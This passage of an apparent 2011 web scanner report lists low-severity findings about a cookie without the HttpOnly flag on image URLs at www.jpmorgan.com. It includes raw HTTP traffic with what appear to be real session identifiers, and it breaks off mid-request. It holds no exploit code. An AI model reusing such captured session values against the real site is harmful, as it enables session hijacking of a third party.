User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:27 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:04:25 GMT
Accept-Ranges: bytes
Content-Length: 1569
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR.../..........wJ.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...kn.8..)..jw2..j....I%N...F..CIN....?....H.a.J........Q...j.._.....s..~..m....\.suN....~...G.......Ks^oI.{7...s,.=.L.d
...[SNIP]...

11.223. http://www.jpmorgan.com/images/language_chooser_pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/language_chooser_pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/language_chooser_pixel.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:59 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2008 21:36:58 GMT
Accept-Ranges: bytes
Content-Length: 146
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.......................................................................................................!.......,...........`....0....B,Jt..;

11.224. http://www.jpmorgan.com/images/lightview/close_large.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/close_large.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/close_large.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:34 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
Accept-Ranges: bytes
Content-Length: 1042
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...M..........@......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y.kSQ....E.P...D).`#.N.tH......A.... t....6[.D......P..4...R...C................w..............z=...V...u.P L.r.q.."..
...[SNIP]...

11.225. http://www.jpmorgan.com/images/lightview/close_small.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/close_small.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/close_small.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:34 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
Accept-Ranges: bytes
Content-Length: 599
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR.............5.7.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...?KBQ..O".D.A...bC...D..C.n9..../.&A.5(.......D
Q.I?..='....s.......=.y.y.{....f.d.j5.1" .. .B....0.}0s-.*.q.r...:....
...[SNIP]...

11.226. http://www.jpmorgan.com/images/lightview/controller_close.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/controller_close.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_close.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:37 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
Accept-Ranges: bytes
Content-Length: 832
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...9o.Q.......@.....PD(
U$Z>@:..hP$S...*..o..S.uk...H..Q.H4H.....3..}..bs.4.o....5;.^.V.D.Xs.oY_..t{....d.g../......a...q
...[SNIP]...

11.227. http://www.jpmorgan.com/images/lightview/controller_next.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/controller_next.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_next.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:37 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
Accept-Ranges: bytes
Content-Length: 752
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....o.A....K.....*.hRD..D....4.DAc
wI..........D.("$...%
B............"#.....owg.f..ZM..+h.z.@......v./..v.n>f..1..DRx..
...[SNIP]...

11.228. http://www.jpmorgan.com/images/lightview/controller_prev.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/controller_prev.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_prev.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:35 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 743
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<....IDATx......A......D...*.6).Y...........,.K..^.^.R_{..`!).,.v-%".(.6....f\W<B......>.....O.^.'..Z.^B.................d2.?...,..
...[SNIP]...

11.229. http://www.jpmorgan.com/images/lightview/controller_slideshow_play.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/controller_slideshow_play.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_slideshow_play.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:37 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 867
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..U;K#Q.>1Q...b....N0.).B@...~....).v.j...F.sk..H..b".DX......VJ.g....;{'....s..9.=.9..N.....s.ip........#.>.w7c..www...
...[SNIP]...

11.230. http://www.jpmorgan.com/images/lightview/controller_slideshow_stop.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/controller_slideshow_stop.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/controller_slideshow_stop.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:36 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 682
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...............l;....tEXtSoftware.Adobe ImageReadyq.e<...LIDATx....n.A...;H...P..M...... .....p..i..T.D...%:.".{.S!@....g6.xW!.............z=."....-mI....t,.I...I.y~f.Y|.V.5.\.....~..
...[SNIP]...

11.231. http://www.jpmorgan.com/images/lightview/inner_next.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/inner_next.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/inner_next.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:35 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 308
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR..............H-.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.9..D..3.....` v.bc..Y . .k..1H %%...
,.........b. .... A&$..i.......E...E....Gh...5.....P.O....5.#IH.1#...}....j..
...[SNIP]...

11.232. http://www.jpmorgan.com/images/lightview/inner_prev.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/inner_prev.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/inner_prev.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:34 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 307
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR..............H-.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.9..D..3.....` v.bc..Y . .k..1H %%...
,.........b. .... A&$..5.A3...F.Yc0..GP...h.F...$....).pqG.....PM..|F(.D.h...
...[SNIP]...

11.233. http://www.jpmorgan.com/images/lightview/inner_slideshow_play.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/inner_slideshow_play.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/inner_slideshow_play.png HTTP/1.1
Host: www.jpmorgan.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Cookie: ACE_COOKIE=R2666079405; ARPT=NKOJWQS188.21-cws7214CKJKQ; JpmcSession=R1LrTc1Gcyk5wJvssGFbvLfYwwHQYdBm63BnpnCQbywrZyFdscZB!-8473515; __utma=214076236.1911910703.1310488007.1310488007.1310488007.1; __utmb=214076236.1.10.1310488007; __utmc=214076236; __utmz=214076236.1310488007.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:26:57 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 478
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...,.........T..<....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..V.J.@.M..Hau....6v...]!...ZY{.`:.....WX.R\.U.@b!WY.'..y.a.. .....vf.};y.............s.-aA8..%..-...Y.MK.vIx$,.........
...[SNIP]...

11.234. http://www.jpmorgan.com/images/lightview/inner_slideshow_stop.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/inner_slideshow_stop.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/inner_slideshow_stop.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:34 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 506
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...,.........T..<....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..V1N.@........<.4.((..."J^`..:<!.hc...(\Zq."R......K.`v..Z].v
$..&..[.............'.s3.&. .!.O.J.....q.wK..#L..V..pOH ..
...[SNIP]...

11.235. http://www.jpmorgan.com/images/lightview/loading.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/loading.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/loading.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:34 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Accept-Ranges: bytes
Content-Length: 1795
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.....?............................................................................................................................................................................................
...[SNIP]...

11.236. http://www.jpmorgan.com/images/lightview/next.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/lightview/next.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/lightview/next.png HTTP/1.1
Host: www.jpmorgan.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
